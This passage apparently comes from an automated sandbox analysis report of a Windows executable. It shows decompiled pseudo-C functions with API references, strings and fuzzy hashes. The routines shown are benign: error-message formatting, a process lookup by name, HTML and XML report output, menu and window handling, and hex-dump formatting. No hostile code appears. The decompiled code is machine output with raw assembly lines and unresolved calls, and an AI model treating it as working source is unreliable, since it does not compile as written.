0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

0x0040598b
0x0040598b
0x0040599a
0x004059ae
0x004059b5
0x004059c1
0x004059c6
0x004059cb
0x004059ce
0x00405a7b
0x00405a7b
0x004059d4
0x004059d4
0x004059dc
0x004059ee
0x00000000
0x004059f0
0x004059f0
0x004059f6
0x004059f7
0x004059fa
0x00405a03
0x00405a2b
0x00405a2e
0x00405a3c
0x00405a40
0x00000000
0x00405a42
0x00405a42
0x00405a54
0x00405a59
0x00405a5a
0x00405a5a
0x00405a61
0x00405a69
0x00405a7f
0x00000000
0x00000000
0x00000000
0x00405a69
0x00405a05
0x00405a0e
0x00405a17
0x00000000
0x00405a19
0x00405a19
0x00405a1c
0x00405a1d
0x00405a20
0x00405a29
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a29
0x00405a17
0x00405a03
0x00000000
0x00405a6b
0x00405a6e
0x00405a72
0x00405a72
0x00000000
0x004059d4
0x00405a81
0x00405a84
0x00405a8f

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

0x00407639
0x00407646
0x00407647
0x00407654
0x0040765f
0x0040765f
0x0040766b
0x0040766d
0x00407672
0x00407677
0x0040767d
0x00407680
0x00407686
0x00407691
0x00407697
0x00407699
0x00407699
0x0040769c
0x0040769f
0x004076a3
0x004076a7
0x004076ab
0x004076b5
0x004076be
0x004076c8
0x004076de
0x004076ee
0x004076f1
0x004076f4
0x004076fa
0x00407708
0x0040770e
0x00407718
0x0040771d
0x00407723
0x00407724
0x00407727
0x0040772c
0x0040772f
0x00407734
0x0040773f
0x00407744
0x00407745
0x0040767d
0x00407760

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

 , xrefs: 00407702
<tr>, xrefs: 00407661
<td bgcolor=#%s nowrap>%s, xrefs: 00407649
<td bgcolor=#%s>%s, xrefs: 00407657

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

0x0040605e
0x00406061
0x00406069
0x00406074
0x0040607a
0x0040607e
0x00406082
0x00406148
0x0040614e
0x00000000
0x00000000
0x00000000
0x00406088
0x00406088
0x00406093
0x00406098
0x0040609f
0x004060ae
0x004060b6
0x004060be
0x004060c6
0x004060ca
0x004060cf
0x004060d7
0x00000000
0x00000000
0x004060de
0x00406129
0x00406129
0x0040612d
0x0040612f
0x00406130
0x00406134
0x00406137
0x0040613c
0x0040613c
0x00000000
0x0040612d
0x004060e7
0x004060f0
0x004060f2
0x004060f2
0x004060f9
0x004060fd
0x00406102
0x0040610c
0x00406112
0x00406117
0x00406117
0x00406104
0x00406104
0x00406104
0x00406104
0x00406102
0x00406122
0x00406128
0x00000000
0x0040613f
0x0040613f
0x00406140
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

0, xrefs: 004060AE
6, xrefs: 004060B6

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

0x00402bee
0x00402bf8
0x00402cae
0x00402c08
0x00402c10
0x00402c11
0x00402c12
0x00402c13
0x00402c20
0x00402c27
0x00402c2e
0x00402c30
0x00402c37
0x00402c4b
0x00402c50
0x00402c53
0x00402c55
0x00402c3e
0x00402c3e
0x00402c41
0x00402c41
0x00402c5a
0x00402c60
0x00402c65
0x00402c68
0x00402c6d
0x00402c77
0x00402c7c
0x00402c7e
0x00402c87
0x00402ca5
0x00402ca5
0x00402c87
0x00402c7c
0x00402c6d
0x00000000
0x00402cac

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

0x004036ef
0x004036f6
0x0040370b
0x00403712
0x00403717
0x0040371c
0x0040371f
0x0040372c
0x00403735
0x00403738
0x00403744
0x00403751
0x00403758
0x00403760
0x00403769
0x0040376c
0x00403778
0x0040377b
0x0040378b
0x00403792
0x00403795
0x00403798
0x0040379b
0x004037a2
0x004037a5
0x004037a8
0x004037af
0x004037b7
0x004037c3
0x00000000
0x004037d4
0x004037dc

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

L, xrefs: 0040378B
cfg, xrefs: 00403717

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00404fe0
0x00404fe9
0x00405000
0x00405005
0x00405009
0x0040500c
0x0040500e
0x00405015
0x00405016
0x00405021
0x00405026
0x00405027
0x0040502c
0x00405031
0x00405039
0x0040503f
0x00405044
0x00405048
0x0040504e
0x00405056
0x0040505c
0x0040504e
0x00405065
0x0040506a
0x00405072
0x00405079

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
